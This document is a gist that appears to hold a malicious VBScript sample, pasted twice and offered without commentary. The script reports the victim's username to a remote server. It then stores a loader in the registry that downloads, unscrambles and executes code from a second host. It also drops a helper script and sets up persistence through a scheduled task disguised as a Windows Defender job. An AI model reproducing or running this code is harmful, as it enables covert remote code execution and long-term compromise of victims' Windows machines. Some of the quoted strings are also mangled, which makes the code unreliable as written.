JohnHammond/normal.crp.vbs Secret

## normal.crp.vbs
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set p0 = CreateObject("msxml2.xmlhttp")
scriptdir = ws.ExpandEnvironmentStrings("%appdata%")
userdir = ws.ExpandEnvironmentStrings("%userprofile%")
username = LCase(ws.ExpandEnvironmentStrings("%username%"))
username = Escape(username)
username = Replace(username,"%u","")

username = Replace(username,"%20","")
chk = "no"
username = LCase(username)
If username <> "bob" And username <> "administrator" Then
    p0.open "GET", "https://retmodul.com/google/goog.php?op=" + username,False
    p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    p0.Send
    WScript.quit
End If
If username = "bob" Then
    username0 = "bob"
    depth = "9"
End If
If username = "administrator" Then
    username0 = "administrator"
    depth = "9"
End If
If Not fs.FileExists(scriptdir + "\filexx.tmp") Then
    asd = "reg add HKEY_CURRENT_USER\Software\RegisteredApplications /v AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g /t reg_sz /d ""Set Post0 = CreateObject(""""""msxml2.xmlhttp"""""")
    Set objFSO = CreateObject(""""""Scripting.FileSystemObject"""""")
    Set wShell = CreateObject(""""""WScript.Shell"""""")
    folder = wShell.ExpandEnvironmentStrings(""""""""%""appdata""%"""""""")

    data = """"""no""""""
    If objFSO.FileExists(folder + """""" \ desktop.tmp"""""") Then
        Set objFile = objFSO.GetFile(folder + """""" \ desktop.tmp"""""")
        If objFile.Size < 10 Then
            objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
            WScript.quit
        End If
        Set f = objFSO.OpenTextFile(folder + """""" \ desktop.tmp"""""", 1, True)
        data = f.ReadAll
        f.Close
        d = ______d_____ _
        L = Len(data)
        s = """"""""""""
        For jx = 0 To d - 1
            For ix = 0 To Int(L / d) - 1
                s = s & Mid(data,ix * d + jx + 1,1)
            Next
        Next
        s = s & Right(data,L - Int(L / d) * d)
        data = s
        objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
    Else
        Post0.open """"""Get"""""", """"""https /  / hodbeast.com / silver / expres.php?op = username0"""""",False
        Post0.setRequestHeader """"""Content - Type"""""", """"""application / x - www - form - urlencoded""""""
        Post0.Send
        t0 = Post0.responseText
        Set f = objFSO.CreateTextFile(folder + """""" \ desktop.tmp"""""", True)
        f.Write(t0)
        f.Close
    End If
    If data <> """"""no"""""" Then
        Execute(data)
    End If
    "" / f"
    asd = Replace(asd,"username0",username0)
    asd = Replace(asd,"______d______",depth)
    re = ws.run(asd, 0, True)
    fs.CreateFolder userdir + "\Microsoft"
    Set objBat = fs.CreateTextFile(userdir + "\Microsoft\sys1.vbs",True)
    objBat.Write "On Error Resume Next
    "+vbcrlf+"Set oFilesToEncode = WScript.Arguments "+vbcrlf+"file = oFilesToEncode(0)"+vbcrlf+"file = Replace(file, ""z"", """""""")"+vbcrlf+"execute(file)"
    objBat.Close
    chk = "file"
    Set hnd = fs.CreateTextFile(scriptdir + "\filexx.tmp", True)
    hnd.Write "111"
    hnd.Close
    p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
    p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    p0.Send
    WScript.quit
End If
If Not fs.FileExists(scriptdir + "\schedxx.tmp") Then
    chk = "schedxx"
    Set hnd = fs.CreateTextFile(scriptdir + "\" + chk + ".tmp", True)
    hnd.Write "111"
    hnd.Close
    tmp = "cmd.exe /c schtasks /create /tn ""Diagnosis\Windows Defender\Microsoft-Windows-Defender"" /tr ""wscript.exe /b """"""%userprofile%\Microsoft\sys1.vbs"""""" """"""On Error Resume Next
    Set d = CreateObject(zWScript.Shellz)
    e = d.RegRead(zHKEY_CURRENT_USER \ Software \ RegisteredApplications \ AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4gz)
    execute(e)"""""""" / sc Minute / mo 61 / f"
    re = ws.run(tmp, 0, True)
    p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
    p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    p0.Send
    WScript.quit
End If
p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send
	On Error Resume Next
	Set fs = CreateObject("Scripting.FileSystemObject")
	Set ws = CreateObject("WScript.Shell")
	Set p0 = CreateObject("msxml2.xmlhttp")
	scriptdir = ws.ExpandEnvironmentStrings("%appdata%")
	userdir = ws.ExpandEnvironmentStrings("%userprofile%")
	username = LCase(ws.ExpandEnvironmentStrings("%username%"))
	username = Escape(username)
	username = Replace(username,"%u","")

	username = Replace(username,"%20","")
	chk = "no"
	username = LCase(username)
	If username <> "bob" And username <> "administrator" Then
	p0.open "GET", "https://retmodul.com/google/goog.php?op=" + username,False
	p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
	p0.Send
	WScript.quit
	End If
	If username = "bob" Then
	username0 = "bob"
	depth = "9"
	End If
	If username = "administrator" Then
	username0 = "administrator"
	depth = "9"
	End If
	If Not fs.FileExists(scriptdir + "\filexx.tmp") Then
	asd = "reg add HKEY_CURRENT_USER\Software\RegisteredApplications /v AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g /t reg_sz /d ""Set Post0 = CreateObject(""""""msxml2.xmlhttp"""""")
	Set objFSO = CreateObject(""""""Scripting.FileSystemObject"""""")
	Set wShell = CreateObject(""""""WScript.Shell"""""")
	folder = wShell.ExpandEnvironmentStrings(""""""""%""appdata""%"""""""")

	data = """"""no""""""
	If objFSO.FileExists(folder + """""" \ desktop.tmp"""""") Then
	Set objFile = objFSO.GetFile(folder + """""" \ desktop.tmp"""""")
	If objFile.Size < 10 Then
	objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
	WScript.quit
	End If
	Set f = objFSO.OpenTextFile(folder + """""" \ desktop.tmp"""""", 1, True)
	data = f.ReadAll
	f.Close
	d = ______d_____ _
	L = Len(data)
	s = """"""""""""
	For jx = 0 To d - 1
	For ix = 0 To Int(L / d) - 1
	s = s & Mid(data,ix * d + jx + 1,1)
	Next
	Next
	s = s & Right(data,L - Int(L / d) * d)
	data = s
	objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
	Else
	Post0.open """"""Get"""""", """"""https / / hodbeast.com / silver / expres.php?op = username0"""""",False
	Post0.setRequestHeader """"""Content - Type"""""", """"""application / x - www - form - urlencoded""""""
	Post0.Send
	t0 = Post0.responseText
	Set f = objFSO.CreateTextFile(folder + """""" \ desktop.tmp"""""", True)
	f.Write(t0)
	f.Close
	End If
	If data <> """"""no"""""" Then
	Execute(data)
	End If
	"" / f"
	asd = Replace(asd,"username0",username0)
	asd = Replace(asd,"______d______",depth)
	re = ws.run(asd, 0, True)
	fs.CreateFolder userdir + "\Microsoft"
	Set objBat = fs.CreateTextFile(userdir + "\Microsoft\sys1.vbs",True)
	objBat.Write "On Error Resume Next
	"+vbcrlf+"Set oFilesToEncode = WScript.Arguments "+vbcrlf+"file = oFilesToEncode(0)"+vbcrlf+"file = Replace(file, ""z"", """""""")"+vbcrlf+"execute(file)"
	objBat.Close
	chk = "file"
	Set hnd = fs.CreateTextFile(scriptdir + "\filexx.tmp", True)
	hnd.Write "111"
	hnd.Close
	p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
	p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
	p0.Send
	WScript.quit
	End If
	If Not fs.FileExists(scriptdir + "\schedxx.tmp") Then
	chk = "schedxx"
	Set hnd = fs.CreateTextFile(scriptdir + "\" + chk + ".tmp", True)
	hnd.Write "111"
	hnd.Close
	tmp = "cmd.exe /c schtasks /create /tn ""Diagnosis\Windows Defender\Microsoft-Windows-Defender"" /tr ""wscript.exe /b """"""%userprofile%\Microsoft\sys1.vbs"""""" """"""On Error Resume Next
	Set d = CreateObject(zWScript.Shellz)
	e = d.RegRead(zHKEY_CURRENT_USER \ Software \ RegisteredApplications \ AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4gz)
	execute(e)"""""""" / sc Minute / mo 61 / f"
	re = ws.run(tmp, 0, True)
	p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
	p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
	p0.Send
	WScript.quit
	End If
	p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
	p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
	p0.Send